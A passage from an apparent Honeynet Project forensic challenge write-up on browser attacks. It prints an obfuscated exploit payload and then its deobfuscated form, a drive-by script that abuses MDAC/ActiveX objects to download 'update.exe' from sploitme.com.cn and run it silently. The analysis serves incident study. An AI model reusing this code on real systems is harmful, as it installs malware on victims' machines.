171179176202222160155135194179161206217210202158162137167143175167207154126111180188124169213215189157154153153151190223218211142105163178169206233216177174173192141192209171195153123102171117174212204189211108156170115146198201195214126142155179172152196227204141170203147158157231188153139102166117145214204193181101129149166181177185158215155141160171171172192217178124139194168122150171173212161163157134141222189194219101153192175126200220155221129161182175171170171211200162140188167138205231182170152164157155120207203194185159151149171179176202222160155135194179161206217210202158162137167143175167207154126111180188124173204194185133143191179179190165187214151159190124160151184154192103157193157154209169208191101129181176157149214194177170127154140126203195218212153141135173171172222224201158120154165192205218181191169104171155144204213228152121153191153175201185192183128125151182145150214190192104128194166143182231191153157162180138190211189190219103143170140174199236155171152163168171171172200186178124123197141119171183190151135121158175149149213215189157152165166183180165196207152159148175151189191223185140107132164159175232204212102162180177152212188155169174152132145179200165183213128138198117160189187209204124158203147158154163204174172109182176141222187177177165152188116179177221214151143141130178145150196176187139119192142154216224194173172164157117161213212177189170143169116179180165188224154142198119168173187163201162140133140141205192190172157102182139137184204194173102144170145119176181213158155135194173160189196212200120158190142159217162205213161109183138175222194193156161154203133137190165188215153163168156155151188219193140132130142138201192203190131175180118149219204216184170141151116148184184188188138121181179150152162181192103124130156121204225196186161109183138175222194193156161154203133137190165188215153163168156155151188219193140132130142138201192191152157132166135144218199156189174154191153192188183155180136124164152156168213218182104103139134180209223181170123106179139144213213215189101154170141188176182171215132105186178170206167224202124140199142138201186188189134164158139157222212178185171144191175186191197226212142141202189161184221181204124158203143181179222204212134165180177157216212173210108154191137192174185196215151125168173169151167154193140107130147159205225205208106175172155149220212156156175144167141189191186213158151175135152172189180214183137123137165192154192204153135162162151148156212227156

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 11 of 30

Page 12: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

133153153153188176181213158151175135155170210222154193136158191164158221222195153110171182138157218214173210108152203120155190202196211139125139138168188234214178124128194165176220235181187169176158175145150212211207158151169119186178181213158155135194176171188167212203124162200165176167230196174123160157134179156214215173174127153174128178182222153142142155170169151188219193140132130166193150231196191152157163155145222203194210164128133183138183182213153134176167116149206162156181138123204143155170234188171118170161151174223195189151172131151144190179183196171130160190137148223204163177174173192168119175183185187143122160151156151190190192102135166144187178198176172130121130120150169192172179137119201148193166162188210130175161152156223192216151163130149167126182199179156134161160137153170195222185138131133149154149162184151138174158151178223191212176169136150149137178220175222131160151118148185183156205136153197141122216233183171118104164173136223191227151172131150132190177198171222130122147183152223179225180120102201144139166233183171118173159135136220192174193110128203186181202236171222130122172138148169192172179137119201144139166230183171118173159134120169191174168172130166132190178182171222130122147186148169179154181163102192143138201169184212138176159173136152191177172169132204156121191181154151143141167117147185217157182140131198157142178234196212122107159154152222204215180175156165166186175165221153131122151115149185183227184158103149146155200166182187134103159152152217195190169122133149116142182162196172135160159189153185217228180101132139141192220224207225153125160152144152196212192175130167156190179221195219131122159189148184162158184137127132143155178236185188138173159115148220195191188175136154115181177181206158130122171118148207192176180121161198149177183182183208101102159117148153190190206175132166170187178182214174134102163187153170187225181175143132169154200229180154168104159189179172192228176102136187115191182220180172129138163119148223183222184137162153149138149166184225134106160135170151193174176172131166133128175235225213154102156133148169183158181137161135143155171183187209130170160135153210193189151105131130140119177198187153130138163116149170191158181122128153146143149224182170153109164135137169191174203122132166156187179162183153132137130115148149203226179138127130148155166230183209139125160152140221191191193119135188136124203197205218127105198137150170192174184101136151149176150182187187126106158151152154192215176169135188132120178181154153134176147118152223221156180159135133145178175171180224173171182154191216189190219104151153175186191197210221142163194175160152196228190103162182142159217164195191126157171151120218214193223168133132175180176185163208150163168173171173192204200139102199166122187219205154135175179154124211189174168168131165174128181197206158127175190122160185163213201103132131165158187231206170106160181176157205214177189123152153153187191201159151128121182185160210226214192104135192142155217218182213131162182136141149214178177165143192153119191197209213142104202171170152192218193120153197141121179229205153161161161172170215212156177166144169145119200163222215141137135189171188188228203125128194165180200225183186173172171176183209203157185175141132175171177223226211151163182115168168162226178136161137169158187229205153139109182139145154215156172110152191153122174183176209153125190117161187218186192162166190156122182225204153127167172154149149213155219165142165174126203201184207153125160178146172199218204104103139134180209223181174122166183118153222215194219103143170140174190220155171152163168171171172200186178124123197141120201198195154127166181139152218199156207161152153186181176198222215143159186172146189230218193158158154165192205218181186161109179154160212195156207161143132183145186181209215128142198135169151163225201124140130157154204226185154102162180139149209215156173171152154167183199223176219152121185179150152162181202162140130167159175231179175135175182154156156216194152110143132137119190164209214143137190122173189162181200136169196146122149189195190110169182117179218203193152172129149174126203195218212153141135173171172222224201158120186165121221165203190106158180155136212189194219101153192175126201223176224126125139172168207163213201103132131165158187231206170106160181176157205214177189123152153153187191201159151128121182185160210226214192104135192142155217221204153131103180154157218214173156158152132149124177223176222152125168184161170192217200140174189142142158219203208160109180117145214190215211160134165167145187164214220134141131186152188192154200141144190154138200169204153127167158177171213204178185164134165166191175236222221142163193184168172200218193103158130147154200234180225169172171176182218204177173101143166115181177219163210150142156175160152196228200124111133143181167225205170152109180117145214190215181168143170145193198201187160127104160182170151222213182159119135145155187180187225142175158152145172191213188169132151145138182197155169130161155120147186183156180101143133145193175183184171143122164172170156214215173174127154145182191201226218142104139174161185163155201162140204156121171233196186156159156155157169191174180175128170152123182220195151127142167189148169195225177141139201148193200166180191138102159135175

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 12 of 30

Page 13: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

168188194188105135188133139175202191223134176181186145189199158184160124151141159186233185171138106156155156220193191189120128170152119178182210170127142167119153169191154177141139133148193182233180191138103161135175168188194188103135166145139175202191152134138163115145189200176180160135202141159187184183209127121156155157171195228207120128170152119183221192170127142167116148207200172177141140152148155204236180191138106161151156151188194188172132150152120175202191152131176167117145189199157180175158149141159186166187209131122156155156223191228202101128170152190178236205155127142167116149208203228177141139133145177205181180191138173159189144220188194188175131130156193175202191151132139159120145189199154180137139201141159186236183151123123156155156223192213193124128170153138183198172174127142167186148223183154177141140153144177178166180191138173161135170149188194189121136189144191175202191222130176148136145189199154180122144148141159187184188210139121156155156223195212188105128170152122179199195155127142167116153186199155177141139130145177205181180191138173159189144149188194188103132189144193175202191222134176186134145189199158184159135134141159186234187225138104156155157170191228168175128170152190179182210170127142167186148223218172177141139131149178178236180191138103159135157171188194188105136151144193175202191222132122182136145189199155180159139133141159186236183151126106156155156153195191181119128170153141180182192170127142168138153208183227177141140153149178191185180191139122159135148222188194189124132204171138175202192169135139171188145189200173182121136153141159186235188187142103156155156152193174192102128170152121179221176170127142167117149207221158177141140149144140171181180191138106163151161169188194188106133151152190175202191153132122167186145189199156185137144153141159186164184171127124156155156152192190192105128170152121182236205224127142167116149169204175177141139134149156174166180191138173164151153171188194189124136189153139175202191222131122167116145189199155180121161204141159187182183171130176156155156150191174188172128170152123182220191153127142167186149169199155177141140150144177204236180191138106159189171172188194188175131167144192175202191152130122167188145189199228181160127134141159186235188209123120156155157172196212202172128170152190179182191152127142167189148223200173177141139131145119191185180191139121161135156151188194189124136166174123175202191222135138186133145189199155181138144153141159186163184225118102156155157171196213176105128170153141178183184173127142168138153207203225177141139201145139186163180191138105160135160153188194188104131150166119175202191224135160160133145189199157180175128153141159186164187225152173156155156151193190193124128170152121183182205151127142167188153185203155177141139132149177190236180191138175164151161170188194188103136166156193175202191153131160156138145189199227185159143133141159186164188209143122156155156151192174192173128170152122178182180173127142167118148169203158177141139132145155179185180191138176159189149170187211210108154191137192174185180215143104156182169151192220183141140199157159179220195191119162157134144209214190169159131153144179201198172209130125159172146185230156192141127185164142187218196174139175181117179155204190151174131150183121190202179206152104202171160151230228202124124188157155150225196190123161172155145223211194215161129133145182191201226218142104139174161184167221193140107192167142204169206153157166180138156212203215211163143191187189190164221220151125168184161152196217183125132197156158179228205154119158171117156213203215211163143191187189190164221217133141156179161151188221201103132196146122191218205208119163179154191216203215223171143132182128190223214213142163202185160151229223202104140187166122183235203190106164157135136216213156223157143132183193200185176209143137189122171210184227176124128197165121179228186190127166172117145216212156181167130192145120190224184151152163190184161222217225179124128194157121175229204153131168158176191209212215203101151149116193199185176209150105160186160188192214178137170133164142209229196186157159180138128207211227156168144169120181201185209217152104202171160151230228202124124188157155220233207171134173159135136220189193177168152132145185181201180218151104160181146151188221201103132196142121191226204174173159180138128207211228219103143170140174199201192219151105156120151188167214203174120148166181175218207186156166161117161219213211207103143170140174198198154222132104189123149207203156182103161196142192209169204190139170180118145154201156211153134169141186199164184217128105160178161188234221192103111189157155217171173212135172171118157217204193156101130192167192198202188211128121181123156149192189186139120167140142221218204212153103171154171209194189177140135190145177200223214222153121155110145222221161193124111188167158150222204213134171182118145213214177188164128132141189191220155225153126156179169210213217180137135201144138221163204212139176171117141220204189206158128169157180174219213215126121197170170152196227200140107192142139170233183171118169182154124209213156181157153153152182174219191222142175155179146184213218182103136200156122187230196190106102158177171222211194185161129149167145187164214220134141131186152188192154200141144190154138154182204153106

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 13 of 30

Page 14: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

104172155145149196215211168144165133176199164195218130137201187147169183221180136173202141192208169196174110160182154120209212216184170154133141183201185191214127102190155168188167172201141120148156122183226206212139143158174149219212216193161153192149142198201226211126125156185161206233226179121123197144154220234182171122164157151187208212156181102152169153188201181159154152163190115161184217216186139154194165178171230205172123160182138179151204192206170135132124188201223192224153123172179169172199209192162111191143139170229183186172174158135140216191189202165133132149189190165192219143141135115147211214227200141136190142138201188192153161171163154120220195193181101151170157179188181159171151104135117161189188154185162162197157154167219204153142169159150190221190174172168131165186191175235213158143125139173171188163214201163135199167122175226206174138165156189190219199154181136137168133156181219205215132105131173160189196212200120158190142159217171173212135166181176157207214178181164152133166182176198222160120163172116169210192154200140111199140142183226205212139160182139149212212157202164129170183121190202179206152104186175169172234212201103136190147159187231196191131160171155137209189173176161154167144190178236183211153138186134149207195214203137131201145139166222206187119122160189174209214190184172133151140179201198210170130123159175171185184174181175119190167155205181187188134162182151136153192190206161154166132124183199179211153138163186150170187214203137158151144193182222206187153122160135136209214190188105133151140179201198196169130102159175171185200172181121135190167156186235188171122162182152156222191213176161154167153139180183179211153138164138153186187214203137139203145156170222206188139120161135148209214190206106132166156179201198171151131138167175171185199157181137143190167155200236185172126162182151175168191154180161154166144193179236187211153138147189149223217214203137139132149177178222206187152104161136144209214190168175131188132179201198183225135160159175171185195159184175161190167155182234184187118162182151148223195191184161154166144121183221195211153139156137148170203214203137119204144155182222206188142175159189174209214190168105132204148179201199184174134176151175171185179228180122135190167155182233188210122162182152157172196191176161154166145138179198209211153138181116153207217214203137140152149155186222206187134104161136144209214190168175131188148179201198195153134176159175171185180174182122127190167155205181184171156162182151141169192190192161154167148193178182183211153138147115150170187214203137119204146140170222206187139125163189148209214190188172132167152179201198210172134176159175171185179158181101135190167155186235184187152162182151148223195212206161154166171137182162175211153139167119149186187214203138144153148155174222206188143125164174160209214191180172131204140179201199195154132123155175171186184176185159127190167156174166184172142162182151145171192212188161154166166123179220191211153138171117152186187214203137143132146155204222206188126173163152144209214190207119132189144179201198213155135138147175171185203158181137119190167155191184184210142162182151160149191213188161154166166120179220209211153138172135149223187214203137139130145178182222206187157124163173174209214190169123132151152179201199196174135139159175171185179154181137139190167155186233185187130162182152148220191228180161154166152190179198171211153138186134149185203214203137119130145155186222206188130175161135148209214190206175132130156179201198183223134176155175171185199225181137127190167155178164187209156162182151145172191191172161154167157142179236171211153138147115149185199214203137131204145156174222206187138105164174160209214191176105132166156179201199196173132138185175171185180176182122123190167155186163188210142162182151156152191174184161154167153142182220209211153139167186152149199214203138144153145177166222206187118102160151156209214190202101132188170179201198205222131176163175171185188177180101123190167155200236183210142162182151161169192228168161154166156124179221195211153138172136149223195214203137128152145177186222206187143125160173148209214190177123132189148179201198196173131160159175171185203156180160143190167155175185184209152162182151161172192213180161154166156119179220175211153138181186148208199214203137153201145177204222206187142103159115160209214190180101131130148176176198222153142142155170160210222216192162174200156121216171206190106162181117149205213177188164127187153120180198171156130121168116150185179159180120127194146122191218205208119165172154141208204194177175151170179179181198179222132105172171170206180228201124124188164122179233195190131162162154175209203193185161153192145183202223191217152104186175169172234212201103136190143180221222204212153102179135187152211177211168144165171176198201206208151125139173168222167221193140107192167142204170205153173158171117187223213177173159144165175176198201206208151125139173168222229163192162162192156180221232195153168109182176141222187177193165152153187176199185163209150176131172168188214211201124111188164192154236206190127176182139145213212215202164131149187193199185176209150105160186160188192214178137170132156159174217195212173172171117186158203215211163143191187189190164221220152105168172170152196227200140107192142139166

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 14 of 30

Page 15: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

229195212161164171176191219203156218170152153153188191165188214129142160182160188192220202104120186156121186226185154153165179154191209189177177168152132145185177223226211151163182115168168230228201124124188164122179233195190131162162135137153192174168172131150132183202164180218151104160181151188188221201103132196142121175229204153131168157117161213212177223158152153124177198236222160120164172171170206180222193140103200166181208171204212139105155136141222213215173106129149174126191223163224128126172171170206180218183137119137164155220236184187118109179150186215189194219169144169116189200224214201150140130124160210234224192103169196166121205222204174173160180117153209193157151128154154141124202165196207152159148185160210225163193124111188167158150222204213134171171118145209203194185161136169187179199201192220153121185177169151188219193140132130141192208169196174110160182154120209212216184170143191124178202197159207152126148175169210196174200124162197157138205232195212164166161117128206211211156104151169149119198182154213130137181122169151188219179162158190164158201225206171101164159150170156212156177166130191149175201185175160127175134185161172222227193140132130166121205232206224106173179139136211193156160158151187120177199185176225152104190174151184214212201125132194157139212233185187138103163152148151191211152120136188141141177198188171134161151183152185188173182136103148145177179185184225152175164135152151195154192163133133145179201184188215151141168185171189195217176162162191140138205182203174139160179115179182189173210165155203133139199164155222151125168115161184217218182174120139140142187229205153138157183188137223212215173172153132171189201181209215132175148124144206233226180121119201142155217171195153123102171117174212204189211108153132120175200186184214151105163178146185230163205134166191167158154220206174161172180172137223212215173172153132171189201181209215154105172171170206180158182104144186166176167232195212164109182176141222187177152106143132137192200236155220143142181170152189188227192141161193142155217230207190131158181177149199191176151110128132144125177163172224151104182188160188162209185162162197157159178232190154139102180138128219211227169123155154133192191202184225129105182171160206167214204124139192146121150167195153123175181116186221202190151163144150178189186186180221143105156171169184180177200140174190166192158194206191135169180117128215187175189105153154141179200165183221153104152172147210200158193136153137165159209220195191127176169189145201194189203161133187124152200223163213152163152183144170204218201124140204143119158163206174173172180117186204196194207172153191153193200235163154142141155184161189218214177175170130166181209169206212123175155138128206211212152170144170166174182201184151150142172175158170171211200162140188167138204224205153106173182177170218199156156157153154145182199165187206139163190175171151200227176122132200165181183235204153172171159150170213193157152159143170149177198181210211128142198115170211222161203162124203140142158219203209102161180117149150212193189170154149120177200223192207153125168137169172200222193140107130142138201232195212165162171118152211189190219171143191178188200164192151134142164115170210222211203141136190142138201220204174123176181117179208188227222163143132187193198201187157135160148137149169188175181137119198144193190166187224101174159152152220190191173122133150136187178182172169130123159120148170196174182122135135141192208169204153127167158177149209214175173101154154141183190224192151143137185177168188195216179120154200156180212224181187169172171176182218213156189101135170149119200223214208153142164175146168214157200140136130164138200229180225122164157151187219203215214170153132153119182202188151152163190172171189196214178120154193157158209224203175134164158134170221188227210108144153124177201201155211151164163184160210171213204136107186166143167222204212135122179138179216204173207171143191178183180165155209142142164173168168218214178141170139169152213162205213161109179154160212212156177166134165167169199164180216143141160115159184213218204103144200166176205166179174161171155138120154203156173174153203175126199164180216133141135175171222180172192104136194167180187203190153127167172154149149189173203175152192133121201235159187151163152186170151218224203120120169164158187165196191126157163117128218214178177171152149119191175235213158153163152188144172188155193159103198168158179218205213131152183137119156212156177166130190179189199164154160130122198185160210225223188103158200167119154218206212161164171155153213212156156120154170149119199164159225133141172171169173192214182103111187164176154180204174173172182115149219212216185161155154149149191201159152133141172171169173192214182103111187164176154198204212123173181117175219214176169157154153170128175164210151153126147121147222171228202124174200164159183230196186106160180117119218203156155171144191166189199185163207143121135186168173179153193137102132141193217162205213161109180117145214190213181171152170133192191202184225143141164148160189196217183140128131157177217232195212164171167139145213212216185137152191137190200164210221153121185179150152204210202158120204165181167222204174139170172154124149194193185171143133153187191201159151129163160188161188184154193138140

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 15 of 30

Page 16: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

197157158150222204213134165156117179210213215173169144165166183180165184220152125168182161188163214201163135199166121187162187191135102181176179206214194185161129149167183191181205218127105160184160189180218193163128186165158186224181187169176180177137209212177189169144169120119177224184211153123152115171173188218192163140130157154204224205154127160156188190211203193177171154170148125190223226207151163197177146185230228201163120190165142187230196190106102158177149209214175173101154154141183190224192151143137185177171151222213203124157192143139170226185154131171181138157216204193152161152192148188200164192151134142164115170210222211203141136190142138201225196190161164179139152211190174172165133133145188200185192218143141131175169211195223202103140130148159183162205212161159182155153209189173203175154154175186191197205218127104164179170152180221192141161136165180158231196187168164157151187208212156181102152169153188201181159208151104164120147210184225202124140199157140179225203190173161157139149218213177189168144169116179199224187215132105160175171171196218201140140200167159182225179212135172171118157217204193156101130191167179201183192218143141131175169211196173204138162189142138201236204212123173179154161222203193152161128203174188200165180209126122130170145151234213192141119136143192157224185224126169159189136220191173210108156169145175201185184214128125167179172152163163205141103188156159183220203170157162157155187158181215181171152165170183180165154178143164168184160152196218201103106185156121158230181170161109182139145154215157193157153187133189190223217160143125139173171188163214201163135199156122175222195191135162164154191209212193189170154149170181199164180216143141160115145222221161193124111188167158150222204213134171171176128208215189156157153154133179199223188171150125190182161168218224192162165194146121158219203208106176172155153167214178185174151169141120201185191214127104160182160189192228200140135192143138201220204175131166172135183171195228184101132151145138179219154225135138182137147185195158181159139198148177171182183224101173164136156152191213189124131204175138178162195213128138198179161206218224192162165194168122191218205208119176179138149219204177188110154169120179200164184207152125167178144206200155184175119204144192187163185172126104160134157150191228168101131149153120178183183154132121168116149169179158184158140131146140174233187224139103159152148152191173189102133151141137183181192152130122185116150168200155180121162152148176187163184171118106163172157150193175184175132149153120179162183151130121168116149185217158184158140131145178170236187224139103160152140149192173189102136166141140178197192152135138155188152206200155185138131134148176187163184172143124163172157150192190176102135165153120183199175155130175168116150169221155181158140131144139182163184186139103160151170150192211189102132204144123182219192152132123155189152222200155180175131133145138187163183171130105161134157150192190193124131203153120179236195155134159168116148169191227180120140131144193179185183224139103160135179169193189189102132150136120178181192152130176160133153168200155180175144153149176187163187210138173164172157150191174180173132149153120183220179225132121168116148169217157181120140131148119191182183186139103159135148220196173189102132150133142182197192152135139172137152206200155180101127131146138187163184225139125161134157150192191189123132165153120179182195155134159168116148169191227181120140131145177191182183224139103159136148153195211189102133151140119180181192152130139159116149206200155185121131201144192187163183171134106163172157150191174180105135165153120179199196171130175168116149185179155185136140131146140183182183224139103159135174152196173189102132166140120179235192152130176160134150168200155182122124150148154187163188187156103163172157150196213193119131187153120183221196174135159168116152223179228180158140131149177200166187208139103163152157172191211189102135188170119183219192152130161167117149184200155181175157132145154187163184209143120163172157150192212192106133149153120182220172169134159168116150170183156184174140131146155205184183170139103160173174150191173189102132189152121183219192152131160163188153184200155181175139132146138187163184210130105159172157150192190184103136149153120180183192170132121168116148170199154185136140131149178191184187224139103159135152150192189189102132166132124178235192152134176147189148222200155181137119131144138187163185172126103160172157150191174184102132165153120182236179155130175168116150169191157185158140131144193171182183208139103160151136150191211189102131204157138180181192152130161171187152184200155185160143133144138187163183171134103160150157150191228180102135187153120179198206174135159168116152207217155181158140131149178186167185170139103159136156153195189189102132166153142183219192152131138181186149168200155185138144149146138187163188187119122164150157150196213192103131149153120178182187152131137168116149223195156182120140131145193166165184170139103159174160223195189189102132204144192183219192152131161159118148168200155181159161132149176187163184210134105160134157150191213188103132165153120179221195153130175168116148208199156185120140131145178186164183224139103160173160222196211189102131189156121179235192152131161171117152222200

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 16 of 30

Page 17: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

155181159135132144154187163184225118175164150157150192228168103133149153120179220191225135159168116148223213228185120127194146122191218205208119165171177148158191178206173131150132190178182171158153163152188144173192228202175103193156181178230181175131165171117128208204189156168144169120181201185209216130159197186172169191158178137170132156159174217203174126111157135137153191177180172143204133177178185183219150125156189146184171217192163131137167180171235179174102107182176141222194194189170144170145177190202172211128121155175171185180174180122131190167155167182183172130159157151187151203194176156153133144128199202214153142142155122171151218218201124139193166122178231204174139171172118153212189212176109153133145193176202222225152175197124170152191161205134166204166193150236205224106176182154145223214178177165152191166182178181226225152105159185148206221161203162124203140142149171204212139105155136141222213215173106129149174126191223163224128126172171170206180218183137119137164155221225195209169166157188186213215156152151151168115128200165183217152104186173169151196214182104102157167180171235179175164111166154141149211173156159144169175186176182172155130125159186160223180212180124131194146122212171196174110160182154120209212216184170153132145192198202172151152103197186159184167212202162140186167142187182204153106102181176128216199215173170144132152182176197159218143141135177171172217161205141103188156159183220203170157162157155187158181216181172153191153175191186184214143141168115146168221161205134166191167158154220206174161172180172137223213178177161143169149193198185192211153121185179172152196227204141170132156159174217204153127167181118137222204193173160134169120179201235172169142105164179171210200195187103128195157158179162181170153134168115148221191173156137153154141179190201188225150125168175171168213218182104103188156159183220203170157162157155187158181215211162129153124176198224184222152163168171161168222161203125128135168122191218205208119176179138157216212177181171144153152128201201159211152104160171170172199217176158140131148193166236183224139103161136144151192173189102131204132119178181192152130123159118150168200155181121119134148176187163185172126173163188157150191191180104131149153120180183180169135121168116148169217155182120140131144139209184187208139103160135136153195211189102133151148193179181192152131102159115148168200155181137157134148176187163184210122176163188157150192191172101132149153120183198180172130137168116153185187227184158140131149156178166187208139103160136161171195211189102132166140120182197192152135139151119148222200155182121161131145176187163183171134103160150157150192190202102132187153120179236183155134159168116150170187228184174140131144193178165184170139103159135148152193173189102132166157142178235192152131176171119152206200155180121131203144138187163183225131125159188157150192174211121133165153120179182175152130121168116148223192172185120140131144193191185188208139103163174156220196211189102131150144191179181192152135160155189150168200155180121157133145138187163187151143122159150157150191174180172136149153120179182172174134137168116153186204176184158140131144119174163185170139103160189157172193173189102132167153141179197192152131122171119152206200155180121131203145138187163184209143122159188157150191175180105135187153120180183179151132121168116148186191155181158140131149139178233183224139103159135152153195211189102131150144123182197192152131139172135148222200155181137119131149154187163185172135122159188157150191174206104136149153120179198179152131175168116148223192173182120140131146140171182187186139103164151174150195211189102136189157137178219192152135161172138153206200155184175119204144176187163188209152106163172157150195191189124131187153120182220209151135159168116148208199156181136140131145193204164184186139103160173161167195211189102132188156124180181192152134160148133152206200155182122123132148192187163185187157124159134157150192212206102131149153120179221191153135159168116149207195227185136140131145193186164185170139103160174148152191211189102132166148121183181192152132123168134150168200155180122139130149154187163188210143124163188157150191174184102132165153120179198171156130175168116152223179228180174140131145155166163183170139103161136144150192211189102131150148120179197192152134176155119148222200155182121131133149176187163183225123122159172157150192190168102131187153120178236196170132121168116148208203226184136140131149178190165183170139103159135152150192189189102131204144120182219192152131138182138153206200155184159157131145176187163188210138107161134157150191175188105135165153120179198192174135159168116149185213225181120140131149156191181185170139103164151137169196189189102136189156121178181192152130122163116149184200155181175135132146138187163184225118105160134157150191213192175135165153120179236183224135159168116149208191157180120140131145177208164188208139103160174152152192173189102131189152121179197192152131161171117148222200155180160139132149138187163184210138104159188157150192212192174136187153120178221195153131175168116149208203156184174140131145177182164183186139103160189136222196189189102132204132121180181192152131160167189153206200155180175157204149138174226185154143158181172137205213216177157155166116188191202205206134142156

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 17 of 30

Page 18: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

188160189221217178137170132156159174217204175130111159139174153191190168172131149115182200164210211151125202173169151196214179162174190165180201162203170164175157151187151203194176156143191175181190223226221142104197124171188167214202103132186166142186225179208139103159138144220203227189102131153140190182235179215132105182178168188234214178124128194157121175229204153131168158176191209212215203101151150187186200235162224128142198172168188214211201124111188164192216171195212161164171176191219203156218108156163179121190202179206151125185124160210222216192162174200156121216231205154139159181118153222211193156163129150132186199186183221130159189122161172200221193141136190140142175226196153127169180117149215193156193171153187171121190202179206150138130186150151221162180125157135146154212235185153160168157188179156203194177174143170175169198200154160151125185181169172217220202103158190165142221220204153135162161118119176195156160168152153153177201183206207152163156171161151199217178137170132156159174217204153127167181118137222204193173160134169120179201235172169142105164179171210200195187103128195157158179162181170127134168115148221191173156137153154141179190201188225150125168175171168187218182103139139165180187165179172123175181176141154189173210108144165120190201202184214128122151179150151199223202125140204164138204235181187169162158177137150213156206164131149174126191197159222153142160178146173214218201162136200167192208169196212110175157138178158191174219165134153152188199185192220143105164178150151221220178174162137157180158235181174164111159135187214194174172172133132178185176235214158153126156120172151171211200163132201166180187218196170106124182176141216214193173101144165171179188164214203128138198124160151184154192103157193157154209169208191102111149177171213212215185171154203120193201185176151153142159124161187229228191136169187140177217223204154126165179173119220193156214109131166132126198219221217128142198115170211222161201103128195166122167235196190123161158176120223196177173101143168145189201202180209143139139172168210200212203120158190154193179214181187169111171117141149203156206164144165175126203202155160142104152115160151217217193136162137169159149189187153110170181138191209214177188164129166183128168223155210142141159178146185229167'));//--></script>

Deobfuscated:

<script> function Complete() { setTimeout('location.href = "about:blank', 2000); }

function CheckIP() { var req = null; try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { try { req = new XMLHttpRequest(); } catch(e) {} } } if (req == null) return "0"; req.open("GET", "/fg/show.php?get_ajax=1&r=" + Math.random(), false); req.send(null); if (req.responseText == "1") { return true; } else { return false; } } var urltofile = 'http://sploitme.com.cn/fg/load.php?e=1';

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 18 of 30

Page 19: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

var filename = 'update.exe';

function CreateO(o, n) { var r = null; try { r = o.CreateObject(n) } catch(e) {} if (!r) { try { r = o.CreateObject(n, '') } catch(e) {} } if (!r) { try { r = o.CreateObject(n, '', '') } catch(e) {} } if (!r) { try { r = o.GetObject('', n) } catch(e) {} } if (!r) { try { r = o.GetObject(n, '') } catch(e) {} } if (!r) { try { r = o.GetObject(n) } catch(e) {} } return r; }

function Go(a) { var s = CreateO(a, 'WScript.Shell'); var o = CreateO(a, 'ADODB.Stream'); var e = s.Environment('Process'); var xhr = null; var bin = e.Item('TEMP') + '\\' + filename; try { xhr = new XMLHttpRequest(); } catch(e) { try { xhr = new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) { xhr = new ActiveXObject('MSXML2.ServerXMLHTTP'); } } if (!xhr) return (0); xhr.open('GET', urltofile, false) xhr.send(null); var filecontent = xhr.responseBody; o.Type = 1; o.Mode = 3; o.Open();

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 19 of 30

Page 20: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

o.Write(filecontent); o.SaveToFile(bin, 2); s.Run(bin, 0); }

function mdac() { var i = 0; var objects = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null); while (objects[i]) { var a = null; if (objects[i].substring(0, 1) == '{') { a = document.createElement('object'); a.setAttribute('classid', 'clsid:' + objects[i].substring(1, objects[i].length - 1)); } else { try { a = new ActiveXObject(objects[i]); } catch(e) {} } if (a) { try { var b = CreateO(a, 'WScript.Shell'); if (b) { if (Go(a)) { if (CheckIP()) { Complete(); } else { aolwinamp(); } return true; } } } catch(e) {} } i++; } aolwinamp(); }

